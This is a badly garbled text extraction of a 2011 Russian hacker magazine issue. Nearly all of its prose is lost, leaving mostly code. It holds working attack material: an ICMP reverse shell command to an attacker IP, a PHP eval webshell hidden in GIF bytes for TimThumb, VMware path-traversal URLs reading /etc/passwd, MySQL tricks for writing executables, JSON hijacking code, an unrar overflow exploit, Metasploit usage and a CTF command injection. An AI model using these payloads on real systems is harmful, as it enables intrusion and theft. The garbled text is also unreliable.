. .
-
,
,
-.
, , .
,
. ,
640 480.
:
(
),
,
.
USB- WDM- (. ., ,
DAVID). - ,
DAVID ,
. Logitech
WebCam Pro 9000 with cam holder,
. Logitech 270 35 .
10 /153/ 2011

, .
, . !
,
,
. ,
,
. .
,
. , ,
. ,
( ).

. 650
5 , 25 .
, ,
(, www.greenlaser.com.ua). ( 20 ) ,
. , .
,
, /.
9 : +, - : ,
, , .
.
,

,
. ,
,

,
90. DAVID
PDF CDR , Calibpoints_Scale30_DIN_A4.pdf. ,
CDR CorelDraw. ,
,
. . ,
.
4. .
, ,
. ,
.
. , ,
. :
, . : 90,

. , .
.
,
,
.
.
,
, .
035
PC ZONE

?
. :
. ,
. ,
. DAVID
, , . .
,
.
,
. -
, .
.
. ,
,
. DAVID-laserscanner.
-, : , .
. .
, ,
.
-, .
,
!

. . ,
: , , . .
! .
. , :
, .
.
(
- ).
(. . ) ,
, .
: .
,
. , ,
.
.
. - ,
- .
: ,
! , .
, , , ,
. . -,
036

$500, DAVID-LASERSCANNER
STARTER-KIT, ,
- LOGITECH PRO 9000,
, USB- .
10 /153/ 2011
3D- $30
3D-
,
( ). -, -
. - ,
, .
.

, .
() ,
, (
). :
.
, ,
45. ,
.
: ,
.

, .
, .

. .
ZBrush Mudbox
. !
TriAngles ,
DAVID. ? , . .
.
.
4-

.
, , .
. :
. , . DAVID
,
. ,
3D-

3D- ( ).
,
. ? , (
)
. .
, :
.
. - ,
.
10 /153/ 2011
3D-,
, . , . , (
)
USB- c CCD-, ( ), :
.
, ,
. z
037
PHREAKING
(po.kumekay.com)

300
Skype- , .
, 5000 ,
. , 300 !
?
- . ,
, .
, ,
, .
, , ,
. , , -, :
, , (, ), , .
.
, , .
-
( 12 , 7 , 600 .) ,
1015 ( ).
.
Segway. ,
.

. (35
) .
.
038

.
, . , 500700
. .
13 , 2,5
( ).
130 .
. ,
-
.
.
,
-, (. . ,
, ;
). ,
, , , .
,
(600700 ) , : 12- .
, .
:
,
, .
,
. , ,
.
- . ,
(ruby)
xmpp
(ruby)
serial
Arduino
10 /153/ 2011
. - .

, .
, .
.
, ,
.
100 ,
: .
,
, , , , , . ,
.
Q1, Q2
IRL530
R1, R2
130
R3, R4
100k
U$1, U$2
MOTOR

,
. ,
110 ,
,
,
.
( 4),
. , : , , , ,
. . , -
-.

. ,
: , WiFi 3G-, ,
XMPP ( GTalk) ,
.
OM-, Arduino.
, . .
10 ,
2 .
( ),
.
( 1), ,
.
, ( ).

, ,
.
(Q1, Q2) IRL530. , 5 ,
. ,
-. -
, , ,
. , . , ,
,
, , ,
. , ,
: . ,

10 /153/ 2011
1.
C13
10nF
C1-C3,C5-C10
100uF/25V
C4,C11, C12
100uF/25V
D13
1N4007
D1-D13
1N5819
JP1
Data
Q1-Q8
IRF1310
R1-R8
360R
U$1-U$4
IR2110N
X1
X2
X3
2. H-
039
PHREAKING
RFP30N06LE Fairchild,
3,3 .
,
H- ( 2),
MOSFET , IRF1310 42 .
4- ,
.
,
IR2110. ,
.
( 2),
. , .
, , , ,
.
- (
goo.gl/r1sr).
,
Arduino. 10 11 . .
.

.
. Skype Google,
,
Ubuntu. ,
.
. PC Arduino.
Ruby Ubuntu (
, Windows,
Cygwin). :
. 0 255, . , 255
, 0 .

require 'rubygems'
require 'xmpp4r-simple'
require 'serialport'
#
sp = SerialPort.new "/dev/ttyUSB0", 9600
#
im = Jabber::Simple.new("ww@mail.com", "pass")
# Jabber
while(true) do
#
im.received_messages do |message|
#
puts "#{message.body}"
a,b = message.body.split(' ')
# , -
sp.write a.to_i.chr+b.to_i.chr
#
#
end
sleep 0.05
#
end

ruby telebot.server.rb
sudo apt-get install ruby rubygems

,
Jabber:
sudo gem install xmpp4r-simple
, , :
sudo gem install xmpp4r-simple ruby-serialport

Jabber
040

,
.
. , RBot'a (teledroids.ru)

,
.

:
(robot-war.ru)
(glavbot.ru)
RBot
10 /153/ 2011
,
.
Arduino
int lPin = 10; //
int rPin = 11; //
int command = 0;
void setup() {
Serial.begin(9600); }
void loop() {
if (Serial.available() > 0) {
//
command = Serial.read();
//
analogWrite(rPin, command);
Serial.println(command, DEC);
//
command = Serial.read();
//
analogWrite(lPin, command);
Serial.println(command, DEC);
// 300
delay(300);}
//
//
analogWrite(rPin, 0);
analogWrite(lPin, 0); }

,
. , , , ,

.
, 1 3,
. ,

Enter.

require 'rubygems'
require 'xmpp4r-simple'
@a = 255/3
@im = Jabber::Simple.new("qq@mail.com", "pass")
@recipient="ww@mail.com"
# Enter
def read_char
begin
#
old_state = 'stty -g'
system "stty raw -echo"
c = STDIN.getc.chr
if(c=="\e")
extra_thread = Thread.new{
c = c + STDIN.getc.chr
c = c + STDIN.getc.chr
}
extra_thread.join(0.00001)
extra_thread.kill
end
rescue => ex
puts "#{ex.class}: #{ex.message}"
puts ex.backtrace
ensure
system "stty #{old_state}"
end
return c
#
10 /153/ 2011

, ,
( ,
) , , , . ,
, ,
, DIP-,
Sparkfun ( sparkfun.com/products/9059
sparkfun.com/products/844).
ArduRoller (github.com/fasaxc/ArduRoller) .
end
#
def show_single_key
c = read_char
case c
#
when "\e[A"
puts ""
@im.deliver(@recipient, @a.to_s+" "+@a.to_s)
when "\e[C"
puts ""
@im.deliver(@recipient, "0 "+@a.to_s)
when "\e[D"
puts ""
@im.deliver(@recipient, @a.to_s+" 0")
# 1 3
when "1"
puts "1"
@a = 255/3
when "2"
puts "2"
@a = 255*2/3
when "3"
puts "3"
@a = 255
# esc
when "\e"
Process.exit
end
end
#
show_single_key while(true)
! .

.
?
? ,
100 , ,
. !
!
, , .
ROS (ros.org/wiki/),

WillowGarage PR2 (goo.gl/SDr8) RBot (rbot.ru). z
041
/ EASY HACK
GreenDog , DSecRG.ru (agrrrdog@gmail.com, twitter.com/antyurin)
EASY
HACK

, -
TCP- back connect. ,
: - , TCP- ?
,
.
DNS- , (
147- ). , ICMP, , Bernardo Damele Nico: reverse icmp
shell. , ( )
ICMP echo request ( ping).
, ICMP echo-reply-
.
, , . -,
back connect,
. -, ,
: raw
socket. , .

icmpsh.exe -t ha.ck.er.ip
, .
,
.

./icmpsh_m.py ha.ck.er.ip vi.ct.im.ip
IP ,
.
Windows, , -, .
, XP, 7-.
Perl, C,
Python. , . ,

ICMP-ping-:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
ICMP-: ,
042
, sqlmap.
, :
ICMP-.
,
.
10 /153/ 2011
EASY HACK
MYSQL
,
,
- . ,
.
. , : -
, .

. , .
Load_File().
FILE CREATE TABLE. ,
, LocalSystem.
,
, :
SELECT HEX(LOAD_FILE(C:/test.exe)) INTO DUMPFILE 'c:/windows/
temp/blablabla';
CREATE TABLE readtest(data longtext);
LOAD DATA INFILE 'c:/windows/temp/blablabla' INTO TABLE
readtest FIELD TERMINATED BY '\\' (data);
.
. , .
longtext.
. , . .
, FILE,
UPDATE, INSERT, CREATE TABLE. , SELECT INTO DUMPFILE. ,
,
, ,
, . ,
, . -, hex-
1024 . -, :
CREATE TABLE writetest(datalongblog);
INSERT INTO writetest(data) VALUES (0x4d5a90..610000);
UPDATE writetest SET data= CONCAT (data,0xaa27000000000000);
[];
SELECT data FROM writetest INTO DUMPFILE 'C:/windows/Temp/test.exe';

.
hex-.
hex-. , ,
exe . (BlackHat 2009, goo.gl/23808).
FRAMEBUSTING-
XSS-track (goo.gl/lXmF8) XSS-. ,

, .
, XSS-: , ,
JavaScript, , .
- ,
.
, .
JavaScript:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
, allow-top-navigation ,

. .
framebusting-
: HTML5- , . ,
.

IE8/9 XSS.
, framebusting,
JavaScipt (XSS). IE,
XSS, (,
), framebuster . , XSS-. , (stored XSS reflected, ,
IE-),
IE. , , .
.
, ,
. - .
, ,
.
sandbox, HTML5 .
<iframe src=?http://www.victim.com? sandbox="allow-same-origin
allow-forms allow-scripts"></iframe>
, .
allow-scripts, . -
10 /153/ 2011
043
/ EASY HACK
XSS
Shell of the Future. ,

, .
HTML5 , COR Cross-origin requests.
-
, .
HTTP-. :
1. XSS.
2. XSS (Shell of the Future).
3. COR.
4. R.
5. COR- .
6. R .
.
JavaScript.
http-.
.
.
framebusting, HttpOnly/
Secure. . , www.andlabs.org/
tools/sotf/sotf.html.
Shell of the Future:
, JSON
Hijacking. ,
,
. , : JSON
, JavaScript
Ajax-. JSON Hijacking
, CSRF (Cross-site request forgery),
.
, , http://
server/secret-info.json GET- (),
, :
["aaaa", "password"]
CSRF , , , ,
:
<script src=http://server/secret-info.json>

JSON-.
JavaScript, JSON, , ,
. ?
, JavaScript
:
var secrets;
Array = function() {
secrets = this;
044
};
</script>
JSON
, . .
// GET- JSON
<script src="http://server/secret-info.json"
type="text/javascript"></script>
// ( )
var yourData = '';
var i = -1;
while(secrets[++i]) {
yourData += secrets[i] + ' ';
}
alert(': ' + yourData);
</script>
.
, .
, ,
,
. Gmail,
2006 :
.
, :
Array.
, , Firefox 2.0.
10 /153/ 2011
EASY HACK
VMWARE
, ,
. ,

. :
,
, ,
. ,
- .
, . , , , ,
. ,

. : , .
: - Immunity,
.
. ? , .
, . , ,
., vSphere, ESX, ESXi, vCenter,
Server. :
intitle:"Welcome to Vmware ESX"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
( 2009 , ESX 3.5),

CVE-2009-3733.
:
https://victim.com/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E
%2E/etc/passwd
?
, . /etc/
vmware/hostd/vmInventory.xml
vmx.
,
vCenter
. web- jetty 6.1.16 :
https://victim.com/vci/downloads/health.xml/%3F/../../../../../..
/../../../any_file
(vpxd-profiler-*),
vCenter .
vmware_
session_rider.rb, VASTO.
:
1. .
2. MSF:
: 902/903,
vmware- http - vmware httpd.
goo.gl/NdMfy.
?
, . VMware
.
nmap. , : 443-
SOAP-, .
, , ,
. -, VASTO.
Metasploit Framework
, BlackHat 2010 (vasto.nibblesec.org). .
.
:
%msframework%\msf3\modules\auxiliary\vasto ( ). ,
3. vCenter (VI client) : 127.0.0.1:9999.

4. .
ESX 4
VMware
10 /153/ 2011
use auxiliary/vasto/vmware_session_rider
set RHOSTvictim.com
set SOAPID 04D40C81-564E-4511-AC0D-D57FFA571E4E
( )
run
, , vCenter, .
( 5 ), VASTO
vmware_
autopwn.rb.
VMware, , .
045
iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)
, WordPress,
HP,

Firefox, , ()
.

WordPress TimThumb
CVSSV2
7.5
(AV:N/AC:L/AU:N/C:P/I:P/A:P)
BRIEF
TinThumb WordPress
- timthumb.php, .
40 ,
. ,
,
! - ,
PHP- . , , .
EXPLOIT
, :
http://www.target.tld/wp-content/themes/THEME/timthumb.
php?src=http://blogger.com.evildomain.tld/pocfile.php
046
10 /153/ 2011
timthumb.php
THEME , .
, . -, , .
:
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
);
, strpos
, - ,
URL , . ,
.
, ,
, - PHP-.
,
- , . http://goo.gl/
We45j, GIF-
35 . , 35 , (!)
PHP- , -, . PoC
:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

GIF- <?php @eval($_
GET['cmd']) ?>. timthumb.php
/wp-content/themes/THEME/cache/
, , . : www.exploit-db.com/exploits/17602.
TARGETS
WordPress TimThumb Plugin 1.* 1.32
SOLUTION
. -, : 1.34 .
-, , ,
. -,
,
$allowedSites = array();. , ,
.
, WordPress,
, :
1. SSH.
2. WordPress.
3. grep -r base64_decode *.
, , , .
4. /tmp txt php.

HP LaserJet Pxxxx Series
CVSSV2
7.8
(AV:N/AC:L/Au:N/C:C/I:N/A:N)
BRIEF
: Metasploit Framework

. LaserJet HewlettPackard. , , . ,
PJL (Printer Job Language).
JetDirect-
9100 ,
PJL.
Firefox 3.6.16
10 /153/ 2011
EXPLOIT
MSF hp_
printer_pjl_traversal hp_printer_pjl_cmd.
047
heap spraying
.
:
RHOST .
RPATH .
RPORT .
!r FILE ,
/, ..
. , ,
, -
( LynxOS), /etc/passwd, ,
/bin/dlsh.
MSF PJL . RHOST RPORT,
CMD ,
. /etc/
passwd, ,
http://goo.gl/UKesp.
OnChannelRedirect, nsIChannelEventSink,
. ,
OBJECT.
metasploit heap spray ROP- DEP
Windows XP SP3.
EXPLOIT
,
. . use-after-free
:
TARGETS
HP LaserJet Pxxxx Series, , LaserJet .
SOLUTION
.
Firefox 3.6.16 OBJECT mChannel Remote Code

Execution Exploit (DEP bypass)
CVSSV2
10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: 5 2011 , : Rh0, CVE: CVE-2011-0065.
use-after-free Mozilla Firefox 3.6.16, , , regenrecht, metasploit Rh0.
, mChannel, OBJECT,
HP,
048
10 /153/ 2011
PJL 309 WEP !
;
, .
base/src/nsObjectLoadingContent.h)
.

data OBJECT.
LoadObject OBJECT.
, , - ,
.

. ,
.
, ,
, ++,
.
,
.
content/base/src/nsObjectLoadingContent.cpp:
nsObjectLoadingContent::OnChannelRedirect(
nsIChannel *aOldChannel,
nsIChannel *aNewChannel,
PRUint32 aFlags)
{
// If we're already busy with a new load, cancel the redirect
if (aOldChannel != mChannel) {
return NS_BINDING_ABORTED;
}
if (mClassifier) {
mClassifier->OnRedirect(aOldChannel, aNewChannel);
}
mChannel = aNewChannel;
return NS_OK;
}
OnChannelRedirect,
, OBJECT (
nsIChannelEventSink) mChannel.
, mChannel ( content/
10 /153/ 2011
nsObjectLoadingContent::LoadObject(nsIURI* aURI,
PRBool aNotify,
const nsCString& aTypeHint,
PRBool aForceLoad)
{
...
if (mChannel) {
...
mChannel->Cancel(NS_BINDING_ABORTED);
...
}
...
}
metasploit, , heap spraying,
. heap spraying , , , , . 0x7fffffff,
,
ring3 .
heap spraying
, , , , . ,
: nop- + shellcode.
,

, , , , ,
. - nop- . heap
spraying
049
unrar <= 3.93
, JS-,
, ,
.
MSF
: metasploit,
, Firefox :
msf# exploit(mozilla_mchannel) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf# exploit(mozilla_mchannel) > set CMD calc.exe
CMD => calc.exe
msf# exploit(mozilla_mchannel) > exploit
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/cnGnlIbrNQYE
[*] Local IP: http://192.168.0.23:8080/cnGnlIbrNQYE
[*] Server started.
TARGETS
Mozilla Firefox 3.6.16
SOLUTION
, .
050
Unrar 3.9.3 Local Stack

Overflow Exploit
CVSSV2
7.2
(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: 5 2011 , : ZadYree, CVE: N/A.
Unrar *nix- ,
, , RAR.
, ZadYree,
, .
EXPLOIT
:
import sys
from struct import *
buf = '-' + '3lrvs'*817 + 'AAA' + pack('I',0x8070197)
shellcode = "\xcc\xcc\xcc\xcc\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\
xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd"
10 /153/ 2011

,

f = open('expl_option', 'wb')
f.write(buf + shellcode + '\012')
f.close()
, ,
, 0x8070197 .
.
esp, jmp esp ( ,
), ,
jmp esp.
unrar.
(^-^) objdump -D /usr/bin/unrar |
806febf: ff e4
jmp
8070197: ff e4
jmp
8070317: ff e4
jmp
807038f: ff e4
jmp
8070527: ff e4
jmp
grep "ff e4" | grep jmp

*%esp
*%esp
*%esp
*%esp
*%esp
, :
(^-^) gdb --args unrar 'cat expl_option '
(no debugging symbols found)
(gdb) r
Starting program: /usr/bin/unrar -3lrvs3lrvs3lrvs...s3lrvsAA...
...
ERROR: Unknown option: 3lrvs3lrvs3lrvs...3lrvsAA...
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbfab6405 in ?? ()
1: x/i $pc
0xbfab6405: int3
(gdb) x/20x $eip-1
0xbfab6404: 0xcccccccc 0xaaaaaaaa 0xbbbbbbbb 0xcccccccc
0xbfab6414: 0xdddddddd 0xbfab6400 0x08067f22 0x0806ec60
0xbfab6424: 0xbfabfdfa 0x08048b97 0xb7483a8c 0x00000000
0xbfab6434: 0x00000000 0xbfab6a98 0x080680e7 0xbfab7f98
0xbfab6444: 0xbfabfdfa 0x08048c77 0xb7483a8c 0x08048460
(gdb)
.
.
TARGETS XXX
unrar <= 3.93
SOLUTION
, , , .

unrar, . z
10 /153/ 2011
zyx2145 , @Kaspersky Lab

touzoku , @
DEFCONCTF
-
-
: BlackHat 2011 DEFCON 19.

,
Capture The Flag (CTF),
.

-, .
052
WWW
0X01. CTF?
:
Hackerdom:
www.hackerdom.ru;
Leet More:
leetmore.ctf.su;
SiBears:
sibears.ru;
Smoked Chicken:
smokedchicken.org.
Capture the Flag ,

-.
, , ,
,
. . , , ,
. CTF:
. , ,
CTF .
, UCSB
iCTF, NuitDuHack, plaidCTF, RuCTFE . DEFCON CTF 1996 .
, , .
4- .
, ( iCTF), -,
POSTECH-Pohang, , , . .
10 /153/ 2011
DEFCON CTF
0X02. DEFCON CTF PREQUALS

Defcon CTF Jeopardy .
.
2530 ,
reverse engineering, forensics, binary exploitation, packet analysis
. .
,
. ,
,
.
, .
700 ,
280. , Team IV, :
Hackerdom ;
Leet More - , ;
SiBears ;
Smoked Chicken - .
,
DEFCON CTF .
, 4-
12 , . .
GRAB 100
- SPDY
5932 . , apache,
SPDY ( HTTP Google). /cgi-bin/
http://pwn583.ddtek.biz:5932/cgi-bin/
phf?Qalias=%0Acat%20/home/Tkf6zKZd/key. ( key). : http://pwn583.ddtek.biz:5932/
cgi-bin/phf?Qalias=%0Acat%20/home/Tkf6zKZd/k*. :
that's fast enough now go take a rest.
FORENSICS 200
NTFS
50
NTFS . MBR , .
X-Ways Forensics, ,
100 dir**, 220
. 21 978 , ,
([0-9a-f]\0{24}){40}.
ntfswalk, \
dir60\key50883. ,
$MFT NTFS- c 110h,
NTFS
100h.
110h-
X-Ways Forensics, (
), ,
, . ,
NTFS 80h,
.
, , NTFS. ,
(
). , : 47a96fac9edb95e641
e835e21ce800934d4c8f7e.
10 /153/ 2011
PWTENT PWNABLES 500

, upload_
new_record class01 class02
. class_02::copy_buffer , 24 .
void class_02::copy_buffer(class_02 * this, char * buffer)
{
unsigned int i;
for (i = 0; i <= 248; + + i) this->buffer[i] = buffer[i];
}
, buffer_len class_count, dump_obj,
,
buffer_len. , , , hash_str rb_tree_item.
view record, , rb_tree_item.
rb_tree_item,
. vftable,
, ,
. .
BINARY L33TNESS 500
PE-
, :
CloseHandle;
HeapAlloc;
memset.
,
, , PEB OEP.
.
:
NtQueryInformationProcess with (push 1eh ; ProcessDebugObjectHandle);
Rdtsc check;
053

0X03. . CTF
CREDITS
IV ( , ),
,
: - , -
, - .

,
, .
,
. ,
, , ,
, jail.
. .
.
,
.
, . ,
Rio, , :
- .
DEFCON CTF,
. ? ,
sheepfucking,
, . ,

,
?
NtSetInformationThread with (push 11h ; ThreadHideFromDebugger).

, ,
, .
,
, .
,
.
.
,
. , ,
: 080052000800520008005200080052000800520008005
2000800520008005200. , : 2FE3903DF19E4B01AC590FBA67
1DC8752BD68339E49147F29F5502AD6310BB71.
054
10 /153/ 2011
DEFCON CTF

14
. DEFCON CTF
Binjitsu ( binary + -), .
ELF .
, -,
. :
.
, -
.
, .
: astle
: 7629
:
EOF\n.
/tmp/castleXXXXXXXX, XXXXXXXX
. castle stdin, stdout stderr
/usr/local/bin/sandy
-o <IPv6> -d -s /tmp/castleXXXXXXXX, IPv6
, .
: sandy.
: . sandy.
: Bunny
: 15323
:
srand(time(0)) (max_size) 5
34.
(rand_port),
1024 65 534,
(bind+listen).
, 1 12 .
max_size .
: , max_size 34 ,
haystack 12
. . -,
, ,
1024 65 534. , seed

time(0), . -,
, ,
. ,
max_size , ret-
haystack, ,
,
, .
:
. , ,
- ,
. , .
: Hiver
: 44366
: :
4 , .
, 10 -.
key
. ,
.
10 .
- ,
,
.
: ,
,
.
: , ,
,
0 , .
, , .
10 /153/ 2011
055
CTF?
The UCSB iCTF
ictf.cs.ucsb.edu
,
. ,
, , 2008 . ,
,
.
CODEGATE CTF
www.codegate.org
.
34 CTF,
. CODEGATE CTF,
,
task-based-.
RUCTFE
www.ructf.org
Hackerdom
, CTF CTF . 2007 .
RuCTF.
2009 . , ,
.
plaidCTF
www.plaidctf.com
PPP -,
2009 ., .
,
.

(gameboard) .
PHD CTF
phdays.ru/ctf_general.asp
Positive Hack Days CTF ,
2011 .
, , .
,

,
,

056
, (
)
20 .
, . .

.
, - .
CTF ,
, LAN- (
), .
, $300
, . .
. ,
. , .
, ICMPv6-. , IPv6-, , World IPv6 Day. ,
IPv6.
.
FreeBSD 8.2, Jail. ,
Jail FreeBSD, - . ,
Jail, .
Jail . ,
, ,
. :
,

, , ,
, ,
, .
/
-.
, .
, ,
100%- .
, , . ,
.
10 /153/ 2011
DEFCON CTF
: Forgetu
: 3128
: .
-
, ,
. : ,
0xB33007D3 (
, ).
0xFC1BE02A, .

127 , .
: ,

. -
(data) 128 ,
( RacvDataFromSocket).
: ,
,
.
0X04.
,

. ,
. CTF
. , , ,
- , rm -rf
/, . tomato
root tomato,
tomator.
, root . ,
, , , .
lollersk8terz Jail, -.
, -
,
, .
, , -
. PLUS@Postech , ssh
. DEFCON
, .
0X05. WHAT HAPPENS IN VEGAS STAYS IN VEGAS

29- Bellagio
after party c
. ,
, 15 000
Black Hat DEFCON ,
. , CTF, : ,
RuCTF, , Leet More CTF, CITCTF
. ,
,
! ,
, , - .
. z
10 /153/ 2011
: Sandy
:
: Sandy
.
: castle ,
,
. . , fopen

.
: Fopen ,
fprintf,
.
: Sheepster
: 5775
:
. ,
: Welcome to the ddtek blog.

, .
:
zzyzxrd. , (flag),
fputs fprintf
. x`lXPPTH@8
(
xevgdirkhe),
fputs. , ,
. ,
.
:
hiver,
. ,
, ,
,
. ,
.
, .
057
.
DDoS-
. 1999 .
,
. ,
. ,
, , DDoS, ,
. ,

.
, .
,
,
( -
). , . ,
.
, Malware
as a Service. -
,
, . ,
.
, Zbot (Zeus), Spyeye, Mariposa, Black Energy, ButterFly,
Reptile. ,
058
10 /153/ 2011
- . , ,
, , , ,
.
,
, , . , ,
Microsoft, .
MICROSOFT VS.
. ?
, , :
Rustock, 80 % .
Coreflood, , $100 .
Waledac, 1,5 -
. FTP.
, - , Microsoft
.
SDL,

( , ). ,
, , .
.

. Digital Crime
Unit, Microsoft Security Response Center, Microsoft Malware Protection
Center,Trust worth Computing,
. Microsoft
,
.

( ) , Command & Control,
C&C.
. IRC. , P2P- ,
.

,
Facebook. ,
:
10 /153/ 2011
059
&C-.
DDoS &C-.
, C&C-.
DNS-, C&C.
IP .
.
.
, ,
.
. , Rustock Coreflood . &C-
.

.
Waledac ,
.
,
, Windows -.
Linux/Unix Psyb0t, Chuck Norris, .
, NAS .
,
Linux .

,
. 2009 ,

.
WALEDAC:
Waledac .
277 . ,
. ,
P2P-.
, . Waledac , . ,
, NAT
80 , , ()
, .
. - ,
100 , ,
P2P .
- fast flux
DNS. ,
Waledac
060
Microsoft Waledac
10 /153/ 2011
-,
.
-
.
. , ,
,
80- , .
,
.
- C&C.
ICANN TRO (temporary

restraining order) 28 .
, DNS-
.
Microsoft Pfizer. Microsoft
Pfizer.
Microsoft
, ,
. ,
, .
,
. Microsoft
, .

Microsoft (bit.ly/rlDUDA).
DNS
Microsoft. DNS-
Microsoft. ,
, ,
. , Microsoft
Waledac, , C

, Microsoft Security Essential Malicious
Software Removal Tool.
WALEDAC:
,
:
1. p2p- .
2. DNS/HTTP-.
3. C&C-.
P2P-.
,
, ,
20 ,
, .
,
, P2P.
-
Microsoft.
P2P-
fast flux DNS.
,
.
,
. DNS ICANN Uniform Domain-Name
Dispute-Resolution Policy .
, ,
DNS-,
.
10 /153/ 2011
Waldac.
, Microsoft .
$250 000 , ,
, Rustock (bit.ly/oR7x88). , .
, Microsoft
, . z
061
qbz (cayd@yandex.ru)
LINKS
bit.ly/qV15Z8

cURL.
bit.ly/oMBmcW
LiveHTTPHeaders
Mozilla Firefox.
-

.

mamba.ru slil.ru.
DVD

,

slil.ru.

.
HTML-,
slil.ru
,
-
: , ,
.
, , .
: , . ,
,
.
, :
CAPTCHA;
(cookie, );
;
JavaScript-;
;
flash;
, .
,
, :
.
, , .
, slil.ru.
, -
, ,
, . ,
:
.
PHP.
cURL.
LiveHTTPHeaders Mozilla Firefox.
062
10 /153/ 2011
, . ,
. ,
. HTML-
.
.
:
1. file_get_contents().
PHP- allow_url_fopen.
.htaccess- Apache (php_flag allow_url_
fopen on). ,
PHP
HTTP-. :
$settings = array('http' => array('method' => 'GET', 'header' =>
"User-Agent: []\r\n".
"Accept: text/xml,application/xml,application/
xhtml+xml;q=0.5\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"));
$settings = stream_context_create($settings);
$html = file_get_contents('http://url.tld/', NULL, $settings);
2. (fsockopen() ,
).
3. cURL.
LiveHTTPHeaders
.
.
.
,
( cURL
file_get_contents).
,
CAPTCHA

/.

.
,

5 %.
API
.

-,

: 90 %.

.
XSS-
.
XSS
,

.

, .
10 /153/ 2011
,

.
-

.

.

.

, ,
,
.

- ,

.
.
cookie-,
.

,
.

JavaScript-
,
,
SSL, , ,

.
PHP cURL,
, .
JavaScript-,

(
JavaScript:
)
js-,
,
, .

HTML- .
Opera
DragonFly
LiveHTTPHeaders.
,
POST-, GET- COOKIE-

.
.

,

. ,
, 5000 .
,
, CMS
.

:
IP-
.
,
1000
,
20- ? socks- proxy-.
IP-, , 100 IP-. ,
100 20, 2000
,
.
063

$curl = curl_init();
$head = array(
'Host: slil.ru',
'User-Agent: []',
'Accept: text/xml,application/xml,application/xhtml+xml;q=0.5',
'Accept-Language: en-us,en;q=0.5',
'Accept-Encoding: gzip,deflate',
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive: 300',
'Connection: keep-alive'
);
// , LiveHTTPHeaders
curl_setopt($curl,
curl_setopt($curl,
curl_setopt($curl,
curl_setopt($curl,
CURLOPT_URL, 'http://slil.ru/31402491');
CURLOPT_RETURNTRANSFER, true);
CURLOPT_HTTPHEADER, $head);
CURLOPT_ENCODING, 'gzip,deflate');
slil.ru
$out = curl_exec($curl); //
curl_close($curl); //
17 ,
slil.ru/31402491 $out.
, :
cURL, , . . Mozilla Firefox

LiveHTTPHeaders.
slil.ru/31402491 .
, .
:
$filedata = explode('<p align="center">', $out);

$filedata = explode('</p>', $filedata[1]);
list($filename, $filesize) = explode(' ',
trim(strip_tags($filedata[0])));
$temp_link = explode('var l1nk=\'', $cResult);
$temp_link = explode('\';', $temp_link[1]);
$temp_link = trim(str_replace("'+'", '', $temp_link[0]));
$data = array('name' => $filename, 'size' => $filesize,
'link' => $temp_link);
GET /31402491 HTTP/1.1

Host: slil.ru
User-Agent: []
Accept: text/xml,application/xml,application/xhtml+xml;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
,
.
? cURL. ,
. , :
, ,
.

function genLinks($from, $to)
{
3

,

. ,

,

.

:
064
(antigate.com)
, ,
.

JPG, GIF PNG.

1 . 1000 .
10 % , ,
- .
(captchabot.com) , .

(80 %),
API. 30
, 30 .

,
.
Death by Captcha
(deathbycaptcha.com) ,
.
1,39 . 1000
.
17
90 % .
API.
10 /153/ 2011
$i = 0; $links = array();
for ($i = 0; $i <= ($to $from); $i++)
{
$links[] = 'http://slil.ru/'.($from+$i);
}
return $links;
}
$links = genLinks(31402491, 31402591);
100 slil.ru 31402491 31402591
. .
, .
cURL :
1. ,
.
2. curl_multi_exec,
.
3. curl_
multi_getcontent.

parseLinks() :
clickUrl=http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin&
target=&login_captcha=&login=xxx&password=x1x2x3&
VAnketaId=0&RedirectBack=http%253A%252F%252Fmamba.
ru%252Findex.phtml%253F
API mamba.ru/ajax/login.phtml?XForm=Login.

. ,
, cookie. , , POST.
.

PHP + cURL.
API , .
:
{"t":"0000000000000","a":00000000,"s":1,"e":0,"d":[],"r":0,"XFor
ms":{"Login":{"found":"\u041d\u0435\u0432\u0435\u0440\u043d\
u043e\u0443\u043a\u0430\u0437\u0430\u043d \u043b\u043e\u0433\
u0438\u043d\u0438\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\
u044c"}}}
$info = parseLinks(genLinks(31402491, 31402591));

:
, - , 1000 , slil.ru, 31402491
31402591. . , , , ,
. , ,
, .

(www.mamba.ru).
, :
1. .
2. .
3. , , false, true.
. , .
, , ,
.
, :
- ,
Ajax API.
, html-,
, 100300
API, . ,
API.
API. html JavaScript-, , ,
LiveHTTPHeaders.
,
, ,
/ :
POST /ajax/login.phtml?XForm=Login HTTP/1.1
Host: mamba.ru
...
Cookie: mmbsid=b8HMuKD6KEILm9GTm5Z0eOMnBLtFy6Xp
...
10 /153/ 2011
{"t":"0000000000000","a":"00000000","s":1,"e":0,"d":[],"r":
"http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin","XForms":0}
,
